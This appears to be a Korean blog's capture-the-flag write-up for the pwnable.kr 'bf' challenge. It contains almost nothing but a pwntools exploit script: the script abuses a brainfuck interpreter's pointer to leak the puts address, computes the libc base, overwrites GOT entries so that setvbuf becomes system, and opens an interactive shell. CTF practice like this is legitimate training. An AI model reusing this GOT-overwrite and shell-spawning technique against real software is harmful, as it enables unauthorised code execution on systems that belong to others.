write-up 귀찮다.
Exploit Code
from pwn import *
#p=process('./bf')
p=remote('pwnable.kr', 9001)
# write "/bin/sh" in 0x804a0a0
payload = ',>,>,>,>,>,>,>,<<<<<<<'
# p -> puts_got
payload += '<'*0x20+','
# leak puts_addr
payload += '.>.>.>.<<<'
# puts_got -> main
payload += ',>,>,>,<<<'
# p -> setvbuf_got
payload += '>'*0x10
# setvbuf_got -> system
payload += ',>,>,>,<<<'
# p -> stdout
payload += '>'*0x38
# stdout -> addr of "/bin/sh"
payload += ',>,>,>,<<<'
# call puts_got
payload += '['
p.sendlineafter(']\n', payload)
p.send('/bin/sh\x00')
log.info('0x804a0a0 : "/bin/sh"')
sleep(1)
p.send('\x18') # p -> puts_got
log.info('p -> puts_got')
sleep(1)
puts_addr = u32(p.recv(4))
log.info('puts addr : '+hex(puts_addr))
libc_base = puts_addr-0x5fca0
log.info('libc base : '+hex(libc_base))
system = libc_base+0x3ada0
log.info('system : '+hex(system))
p.send(p32(0x8048694)) # puts_got -> main
log.info("puts_got -> main")
sleep(1)
p.send(p32(system))
log.info("setvbuf_got -> system")
sleep(1)
p.send(p32(0x804a0a0))
log.info('stdout -> addr of "/bin/sh"')
log.info("Success!")
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.kr' 카테고리의 다른 글
| dragon (0) | 2020.03.07 |
|---|---|
| crypto1 (0) | 2020.03.07 |
| ascii_easy (0) | 2020.03.07 |
| unlink (0) | 2020.03.07 |
| Random (0) | 2020.03.07 |